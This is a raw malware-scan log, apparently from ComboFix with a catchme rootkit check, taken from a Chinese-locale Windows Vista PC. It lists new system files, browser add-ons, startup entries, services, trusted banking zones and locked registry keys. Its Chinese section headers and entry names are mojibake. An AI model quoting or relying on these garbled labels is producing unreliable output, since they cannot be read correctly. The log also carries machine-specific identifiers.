2014-07-22 02:57 . 2014-07-22 02:57 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2014-07-22 02:57 . 2014-07-22 02:57 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2014-07-22 02:57 . 2014-07-22 02:57 1069056 ----a-w- c:\windows\system32\DWrite.dll
2014-07-22 02:57 . 2014-07-22 02:57 1029120 ----a-w- c:\windows\system32\d3d10.dll
2014-07-22 02:57 . 2014-07-22 02:57 34304 ----a-w- c:\windows\system32\atmlib.dll
2014-07-22 02:57 . 2014-07-22 02:57 293376 ----a-w- c:\windows\system32\atmfd.dll
2014-07-22 02:57 . 2014-07-22 02:57 615936 ----a-w- c:\windows\system32\themeui.dll
2014-07-22 02:57 . 2014-07-22 02:57 1548288 ----a-w- c:\windows\system32\WMVDECOD.DLL
2014-07-22 02:56 . 2014-07-22 02:56 49152 ----a-w- c:\windows\system32\csrsrv.dll
2014-07-22 02:56 . 2014-07-22 02:56 1205168 ----a-w- c:\windows\system32\ntdll.dll
2014-07-22 02:56 . 2014-07-22 02:56 64000 ----a-w- c:\windows\system32\smss.exe
2014-07-22 02:56 . 2014-07-22 02:56 3603904 ----a-w- c:\windows\system32\ntkrnlpa.exe
2014-07-22 02:56 . 2014-07-22 02:56 3551680 ----a-w- c:\windows\system32\ntoskrnl.exe
2014-07-22 02:56 . 2014-07-22 02:56 24064 ----a-w- c:\windows\system32\drivers\tssecsrv.sys
2014-07-22 02:56 . 2014-07-22 02:56 15872 ----a-w- c:\windows\system32\icaapi.dll
2014-07-22 02:56 . 2014-07-22 02:56 783360 ----a-w- c:\windows\system32\rpcrt4.dll
2014-07-22 02:55 . 2014-07-22 02:55 98304 ----a-w- c:\windows\system32\cryptnet.dll
2014-07-22 02:55 . 2014-07-22 02:55 172544 ----a-w- c:\windows\system32\wintrust.dll
2014-07-22 02:55 . 2014-07-22 02:55 133120 ----a-w- c:\windows\system32\cryptsvc.dll
2014-07-22 02:54 . 2014-07-22 02:54 812544 ----a-w- c:\windows\system32\certutil.exe
2014-07-22 02:54 . 2014-07-22 02:54 41984 ----a-w- c:\windows\system32\certenc.dll
2014-07-22 02:53 . 2014-07-22 02:53 443904 ----a-w- c:\windows\system32\win32spl.dll
2014-07-22 02:53 . 2014-07-22 02:53 37376 ----a-w- c:\windows\system32\printcom.dll
2014-07-22 02:53 . 2014-07-22 02:53 1082232 ----a-w- c:\windows\system32\drivers\ntfs.sys
2014-07-22 02:53 . 2014-07-22 02:53 36864 ----a-w- c:\windows\system32\tsgqec.dll
2014-07-22 02:53 . 2014-07-22 02:53 2691072 ----a-w- c:\windows\system32\mstscax.dll
2014-07-22 02:53 . 2014-07-22 02:53 131072 ----a-w- c:\windows\system32\aaclient.dll
2014-07-22 02:53 . 2014-07-22 02:53 376320 ----a-w- c:\windows\system32\winsrv.dll
2014-07-22 02:52 . 2014-07-22 02:52 2560 ----a-w- c:\windows\system32\drivers\zh-CN\wdf01000.sys.mui
2014-07-22 02:52 . 2014-07-22 02:52 9728 ----a-w- c:\windows\system32\Wdfres.dll
2014-07-22 02:52 . 2014-07-22 02:52 47720 ----a-w- c:\windows\system32\drivers\WdfLdr.sys
2014-07-22 02:52 . 2014-07-22 02:52 16896 ----a-w- c:\windows\system32\winusb.dll
2014-07-22 02:52 . 2014-07-22 02:52 73216 ----a-w- c:\windows\system32\WUDFSvc.dll
2014-07-22 02:52 . 2014-07-22 02:52 66560 ----a-w- c:\windows\system32\drivers\WUDFPf.sys
2014-07-22 02:52 . 2014-07-22 02:52 613888 ----a-w- c:\windows\system32\WUDFx.dll
2014-07-22 02:52 . 2014-07-22 02:52 38912 ----a-w- c:\windows\system32\WUDFCoinstaller.dll
2014-07-22 02:52 . 2014-07-22 02:52 196608 ----a-w- c:\windows\system32\WUDFHost.exe
2014-07-22 02:52 . 2014-07-22 02:52 172032 ----a-w- c:\windows\system32\WUDFPlatform.dll
2014-07-22 02:52 . 2014-07-22 02:52 155136 ----a-w- c:\windows\system32\drivers\WUDFRd.sys
2014-07-22 02:49 . 2014-07-22 02:49 347136 ----a-w- c:\windows\system32\RMActivate_ssp.exe
2014-07-22 02:49 . 2014-07-22 02:49 332288 ----a-w- c:\windows\system32\msdrm.dll
2014-07-22 02:49 . 2014-07-22 02:49 152576 ----a-w- c:\windows\system32\secproc_ssp_isv.dll
2014-07-22 02:49 . 2014-07-22 02:49 152064 ----a-w- c:\windows\system32\secproc_ssp.dll
2014-07-22 02:49 . 2014-07-22 02:49 526336 ----a-w- c:\windows\system32\RMActivate_isv.exe
2014-07-22 02:49 . 2014-07-22 02:49 518144 ----a-w- c:\windows\system32\RMActivate.exe
2014-07-22 02:49 . 2014-07-22 02:49 471552 ----a-w- c:\windows\system32\secproc_isv.dll
2014-07-22 02:49 . 2014-07-22 02:49 471552 ----a-w- c:\windows\system32\secproc.dll
2014-07-22 02:49 . 2014-07-22 02:49 346624 ----a-w- c:\windows\system32\RMActivate_ssp_isv.exe
2014-07-22 00:56 . 2014-07-22 00:56 245760 ----a-w- c:\windows\system32\uninst_saver.exe
2014-07-20 18:44 . 2014-07-20 18:44 83304 ----a-w- c:\windows\system32\drivers\ksapi.sys
2014-07-20 18:44 . 2014-07-20 18:44 27240 ----a-w- c:\windows\system32\drivers\KavBootC.sys
2014-07-14 13:22 . 2012-12-15 05:18 97648 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2014-07-02 16:07 . 2014-07-21 01:39 358984 ----a-w- c:\windows\system32\drivers\Lsmon.sys
2014-07-02 16:07 . 2014-07-21 01:39 358984 ----a-w- c:\windows\system32\drivers\Drmon.sys
.
.
(((((((((((((((((((((((((((((((((((((   Ҫ   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*ע* հϷȱʡ¼ᱻʾ 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{00000ADA-7E0D-47C1-986C-F017D09C4304}]
2014-01-13 18:43 1037192 ----a-w- c:\users\Public\Thunder Network\XMP4\Addins\VideoUrlSniffer.2.2.1.150.(415).dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{0A0DDBD3-6641-40B9-873F-BBDD26D6C14E}]
2010-06-24 11:13 143360 ----a-w- q:\program files\easyMule\modules\IE2EM.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{0F4BF955-A127-41B7-A998-369904AA2578}]
2014-04-16 10:23 126792 ----a-w- q:\program files\360\360sd\360sdbho.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814}]
2014-07-21 23:56 752960 ----a-w- q:\program files\IObit\IObit Uninstaller\UninstallExplorer32.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{43BEAFD9-E005-483D-A367-146BA6C8A32E}]
2010-04-19 22:08 312896 ----a-w- q:\program files\Tudou\Tudou\tudouDetector.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{658D2C4F-158A-46FB-8C96-B1C8F56DBBE9}]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{DDD362CF-523B-4BC9-8FDC-58F93B6BC945}]
2014-08-19 03:19 462392 ----a-w- c:\users\THINK\AppData\Roaming\Tencent\QQ\QQAntiPhishing\AccountProtect.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{DE05CF4A-7B0A-4775-B5E5-396244938679}]
2013-11-14 07:34 1857992 ----a-w- q:\program files\Thunder Network\Thunder\Thunder BHO Platform\np_tdieplat.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\..Walkbox_Overlayicon_ReqSync]
@="{7C4D429D-6880-4C91-AD69-6FB67DD4D4DB}"
[HKEY_CLASSES_ROOT\CLSID\{7C4D429D-6880-4C91-AD69-6FB67DD4D4DB}]
2011-01-13 11:34 1181424 ----a-w- c:\users\THINK\AppData\Roaming\Thunder Network\Walkbox\walkboxext_1.4.2.90.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\..Walkbox_Overlayicon_Synced]
@="{4F2FE7FB-CD8B-4891-BB16-94CCBC2D968F}"
[HKEY_CLASSES_ROOT\CLSID\{4F2FE7FB-CD8B-4891-BB16-94CCBC2D968F}]
2011-01-13 11:34 1181424 ----a-w- c:\users\THINK\AppData\Roaming\Thunder Network\Walkbox\walkboxext_1.4.2.90.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\..Walkbox_Overlayicon_Syning]
@="{D04A1EC4-9683-44B0-87BC-7B86A1BB81AA}"
[HKEY_CLASSES_ROOT\CLSID\{D04A1EC4-9683-44B0-87BC-7B86A1BB81AA}]
2011-01-13 11:34 1181424 ----a-w- c:\users\THINK\AppData\Roaming\Thunder Network\Walkbox\walkboxext_1.4.2.90.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\360FileGuardAntiDel]
@="{130DA40A-D640-44D7-9CC6-FAA1CD6B3DEA}"
[HKEY_CLASSES_ROOT\CLSID\{130DA40A-D640-44D7-9CC6-FAA1CD6B3DEA}]
2014-05-28 02:56 175944 ----a-w- q:\program files\360\360sd\ShellIco.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\AAADesktopTips]
@="{4562B511-62E9-4533-B7B2-56A8BB10B482}"
[HKEY_CLASSES_ROOT\CLSID\{4562B511-62E9-4533-B7B2-56A8BB10B482}]
2013-11-06 02:56 264584 ----a-w- c:\users\Public\Thunder Network\KanKan\reghelper\xappex.1.1.1.73.(426).dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-05-25 00:36 130736 ----a-w- c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-05-25 00:36 130736 ----a-w- c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-05-25 00:36 130736 ----a-w- c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-05-25 00:36 130736 ----a-w- c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\QVODOverlayIcon]
@="{237A913F-9059-4E00-8C29-624C3C015013}"
[HKEY_CLASSES_ROOT\CLSID\{237A913F-9059-4E00-8C29-624C3C015013}]
2013-04-22 07:37 143984 ----a-w- c:\program files\QMovie\QVODShellIcon.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Acrobat Synchronizer"="q:\program files\Adobe.Acrobat.X.Pro\Acrobat\AdobeCollabSync.exe" [2010-11-16 1216416]
"360sd"="q:\program files\360\360sd\360sdrun.exe" [2014-05-28 832840]
"Grid Service"="c:\program files\GridService\peer.exe" [2008-12-30 4993024]
"ImeGuardCom"="q:\program files\SogouInput\6.1.0.6700\SogouInput\Components\AddressSearch\1.0.0.1255\SGImeGuard.exe" [2013-11-28 347256]
"HP Officejet Pro 8600 (NET)"="c:\program files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe" [2012-10-17 1837672]
"renrenservice"="c:\users\THINK\AppData\Roaming\renren.com\RenRenService.exe" [2012-12-28 1185632]
"ctfmon"="c:\windows\system32\ctfmon.exe" [2006-11-02 8704]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2014-07-23 751184]
.
c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
īˮ - HP Officejet Pro 8600 ().lnk - c:\windows\system32\RunDll32.exe "c:\program files\HP\HP Officejet Pro 8600\bin\HPStatusBL.dll",RunDLLEntry SERIALNUMBER=CN346BWGWV05KC;CONNECTION=NW;MONITOR=1; [2006-11-2 44544]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Bluetooth.lnk - c:\program files\ThinkPad\Bluetooth Software\BTTray.exe [2011-1-24 804128]
STK02N 2.3 PNP Monitor.lnk - c:\windows\STK02N\STK02NM.exe [2011-12-12 163840]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"PromptOnSecureDesktop"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"DisableCAD"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"EnableShellExecuteHooks"= 1 (0x1)
"OldEnableShellExecuteHooks"= 1 (0x1)
.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"AlwaysShowClassicMenu"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk *\0OODBS
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages REG_MULTI_SZ   scecli ACGina
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\keyboard layouts\e0210804]
   Ime File REG_SZ         SOGOUPY.IME
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Conew Rescue Service]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^PPTV.lnk]
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^THINK^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^īˮ - .lnk]
path=c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\īˮ - .lnk
backup=c:\windows\pss\īˮ - .lnk.Startup
backupExtension=.Startup
.
[HKLM\~\startupfolder\C:^Users^THINK^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^īˮ - HP Officejet Pro 8600 ().lnk]
path=c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\īˮ - HP Officejet Pro 8600 ().lnk
backup=c:\windows\pss\īˮ - HP Officejet Pro 8600 ().lnk.Startup
backupExtension=.Startup
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Officejet Pro 8600 (NET)
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QvodTerminal
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2013-04-22 01:43 59720 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Creative SB Monitoring Utility]
2010-01-12 06:04 98816 ----a-w- c:\windows\System32\SBAVMon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2013-05-31 15:56 152392 ----a-w- q:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\renrenservice]
2012-12-28 19:30 1185632 ----a-w- c:\users\THINK\AppData\Roaming\renren.com\RenRenService.exe
.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
"ABBYY Screenshot Reader Bonus"="c:\program files\ABBYY FineReader 9.0 Sprint\Bonus.ScreenshotReader.exe" -autorun
"renrenservice"="c:\users\THINK\AppData\Roaming\renren.com\RenRenService.exe" /background
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"MaxMenuMgr"="c:\program files\Seagate\SeagateManager\FreeAgent Status\StxMenuMgr.exe"
"VolPanel"="q:\program files\Creative\USB Sound Blaster HD\Volume Panel\VolPanlu.exe" /r
"EEventManager"="c:\program files\Epson Software\Event Manager\EEventManager.exe"
"APSDaemon"=
"xbupdater"="c:\program files\Tao123\1\xbUpdater.exe"
"UnlockerAssistant"="q:\program files\Unlocker\UnlockerAssistant.exe"
"HP Software Update"=c:\program files\Hp\HP Software Update\HPWuSchd2.exe
"BeatTrojanWall"=q:\program files\ľʦ2012ȫװ\ľʦǽ2012\BeatTrojanWall.exe
"Creative SB Monitoring Utility"=RunDll32 sbavmon.dll,SBAVMonitor
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Svc\S-1-5-21-55330172-1766457534-1491637609-1000]
"EnableNotificationsRef"=dword:00000001
.
R2 360rp;360 ɱʵʱط;q:\program files\360\360sd\360rps.exe [2014-05-28 251208]
R3 360AvFlt;360AvFlt mini-filter driver;c:\windows\system32\DRIVERS\360AvFlt.sys [2014-04-23 65608]
R3 AdvancedSystemCareService7;Advanced SystemCare Service 7;q:\program files\IObit\Advanced SystemCare 7\ASCService.exe [2014-01-14 881952]
R4 ADMonitor;AD Monitor;c:\windows\system32\ADMonitor.exe [2009-03-18 106496]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceNoNetwork REG_MULTI_SZ   PLA DPS BFE mpssvc
bthsvcs REG_MULTI_SZ   BthServ
DoctorService REG_MULTI_SZ   XLDoctor Service
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
XLServicePlatform REG_MULTI_SZ   XLServicePlatform
PPTVServiceGroup REG_MULTI_SZ   PPTVService
xbplussvc REG_MULTI_SZ   XiaobaiPlusSvc
bdx REG_MULTI_SZ   scan sysagent
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{10880D85-AAD9-4558-ABDC-2AB1552D831F}]
2007-10-18 07:25 451872 ----a-w- c:\program files\Common Files\LightScribe\LSRunOnce.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-07-22 04:10 1104200 ----a-w- c:\program files\Google\Chrome\Application\36.0.1985.125\Installer\chrmstp.exe
.
 ƻ ļ
.
2014-03-13 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-05 22:56]
.
2014-07-15 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-12-07 04:55]
.
2014-07-15 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-12-07 04:55]
.
.
------- ɨ -------
.
uStart Page = hxxp://www.6655.com/vista.html
mStart Page = about:blank
uInternet Settings,ProxyOverride = local
IE: &Uʹزղ - q:\program files\NamiRobot\Data\du.html
IE: &ʹ&Ѹ - q:\program files\Thunder Network\Thunder\BHO\\GetUrl.htm
IE: &ʹ&Ѹȫ - q:\program files\Thunder Network\Thunder\BHO\\GetAllUrl.htm
IE: &ʹ&Ѹ - q:\program files\Thunder Network\Thunder\BHO\OfflineDownload.htm
IE: &ʹ115ŵ - q:\program files\115\UDown\getUrl.htm
IE: &ʹ115ŵȫ - q:\program files\115\UDown\getAllUrl.htm
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: ʹ(&X) - q:\program files\Tencent\QQDownload\xfgeturl.htm
IE: ʹȫ(&Q) - q:\program files\Tencent\QQDownload\xfgetAllurl.htm
IE: ʹ缫(ԱȨ)(&J) - q:\program files\Tencent\QQDownload\xftopspeed.htm
IE: ʹõ¿ - q:\program files\easyMule\IE2EM.htm
IE: ʹѸ׿ - c:\users\Public\Thunder Network\XMP4\Core\Program\XmpIEMenu.htm
IE: 浽ռ(ԱȨ)(&K) - q:\program files\Tencent\QQDownload\xfofflineonly.htm
IE: ͼ͵ Bluetooth 豸(&B)... - c:\program files\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm
IE: Microsoft Excel(&X) - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
IE: Microsoft Office Excel(&X) - c:\progra~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
IE: ҳ淢͵ Bluetooth 豸(&B)... - c:\program files\ThinkPad\Bluetooth Software\btsendto_ie.htm
IE: {{14c1d00e-0b92-4379-880b-444fa2d740dd} - c:\users\Public\Thunder Network\XMP4\Core\Program\XmpIEToolMenu.htm
IE: {{24c1d00e-0b92-4379-880b-444fa2d740dd} - c:\users\Public\Thunder Network\XMP4\Core\Program\XmpIEToolBar.htm
IE: {{548BF84E-9665-47f9-B635-7380F8943E90}
IE: {{5D578929-E74E-46A2-A810-4F33D011DC52} - c:\program files\Common Files\Thunder Network\Kankan\XLStartKankan.exe
Trusted Zone: 255.148\202.96
Trusted Zone: alipay.com
Trusted Zone: alisoft.com
Trusted Zone: bankofchina.com
Trusted Zone: boc.cn
Trusted Zone: ccb.cn\b2b
Trusted Zone: ccb.com\www
Trusted Zone: ccb.com.cn\*
Trusted Zone: ccb.com.cn\ca2
Trusted Zone: ccb.com.cn\ca3
Trusted Zone: ccb.com.cn\ibsbjstar
Trusted Zone: ccb.com.cn\mybank
Trusted Zone: nbcb.com.cn\*
Trusted Zone: nbcb.com.cn\corporbank
Trusted Zone: nbcb.com.cn\www
Trusted Zone: online.unionpay.com
Trusted Zone: securitycenter.alipay.com
Trusted Zone: taobao.com
Trusted Zone: unionpaysecure.com
Trusted Zone: alipay.com
Trusted Zone: alisoft.com
Trusted Zone: taobao.com
TCP: DhcpNameServer = 167.206.112.138 167.206.7.4 167.206.3.168
Handler: KuGoo - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - q:\progra~1\KuGou7\KUGOO3~1.OCX
Handler: KuGoo3 - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - q:\progra~1\KuGou7\KUGOO3~1.OCX
DPF: HighSpeedDownloadIE - hxxp://st2.dbank.com/netdisk/plugin/1011/DBank_downloadplugin.CAB
DPF: {2B24B8F5-8FAD-4933-8E6C-3CAAEEA4D217} - hxxp://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
DPF: {45D2E7C0-B894-43CE-B64E-F210DBEC8C94} - hxxp://www.activextest.com/activex/ActiveXScanner.CAB
DPF: {816BE035-1450-40D0-8A3B-BA7825A83A77} - hxxp://support.lenovo.com/Resources/Lenovo/AutoDetect/Lenovo_AutoDetect2.cab
DPF: {9E2CD2C3-4DDA-4473-B904-B8E6D0DBAB86} - hxxp://think.lenovo.com.cn/ThinkEDriver/cab/npdueng.cab
DPF: {BBF51028-5890-4817-A2C4-5F3CFCEBD7EF} - hxxp://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
.
.
------- ļ -------
.
txtfile=c:\windows\notepad.exe %1
.
- - - - ORPHANS REMOVED - - - -
.
ShellIconOverlayIdentifiers-{486C8576-C2C5-42AD-87C6-5E9681633935} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
ShellIconOverlayIdentifiers-{683617F1-0DD4-4B24-B87F-73CE23B8440C} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
ShellIconOverlayIdentifiers-{6B3CB227-0A30-418E-A673-FF1F142D9327} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
ShellIconOverlayIdentifiers-{B2AF7140-40A1-449E-82B9-2C0876C97AF4} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
ShellIconOverlayIdentifiers-{F3E9E0C3-F30E-4EB1-9926-A5DA9DC2F68D} - c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
SafeBoot-WudfPf
SafeBoot-WudfRd
MSConfigStartUp-Google Update - c:\users\THINK\AppData\Local\Google\Update\GoogleUpdate.exe
AddRemove-Ͻͷȫ - f:\Ͻͷȫ\uninst.exe
AddRemove-ʽV2.0 - c:\windows\iun6002.exe
AddRemove-hao123desk - c:\users\THINK\AppData\Roaming\baidu\hao123\hao123.1.0.0.1097.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-09-14 16:22
Windows 6.0.6002 Service Pack 2 NTFS
.
ɨ豻صĽ  
.
ɨ豻ص  
.
ɨ豻صļ  
.
.
c:\users\THINK\AppData\Local\Temp\828\AppData\Roaming\Microsoft\Windows\Cookies\1HJM9B6G.txt 980 bytes
c:\users\THINK\AppData\Local\Temp\828\AppData\Roaming\Microsoft\Windows\Cookies\W7QR8019.txt 1578 bytes
c:\users\THINK\AppData\Local\Temp\918\AppData\Roaming\Microsoft\Windows\Cookies\W6VD64QC.txt 585 bytes
.
ɨ
صĵ: 3
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet006\Services\{1BA31E5A-C098-42d8-8F88-3C9F78A2FDDC}]
"ImagePath"="\??\q:\program files\CyberLink\PowerDVD10\PowerDVD10\NavFilter\000.fcl"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000\RemoteAccess\Profile\[&^ޏc *2*]
"AutoConnect"=dword:00000000
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000\RemoteAccess\Profile\[&^ޏc *3*]
"AutoConnect"=dword:00000000
"EnableAutodisconnect"=dword:00000000
"EnableExitDisconnect"=dword:00000000
"DisconnectIdleTime"=dword:00000014
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000\RemoteAccess\Profile\[&^ޏc *4*]
"AutoConnect"=dword:00000000
"EnableAutodisconnect"=dword:00000001
"EnableExitDisconnect"=dword:00000001
"DisconnectIdleTime"=dword:00000014
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\Applications\YoukuDesktop.exe\shell\O(uOw[7bz *Sb*_\command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|explorer|%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\BitTorrent\Shell\O(uQ*Q*eΘSb*_B*T*eN(*&*Q*)*\Command]
@="\"q:\\Program Files\\Tencent\\QQDownload\\QQDownload.exe\" /BT=\"%1\""
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-232748)
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.3GP\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.ASF\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.AVI\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.DAT\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.DV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.DVIX\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.FLV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
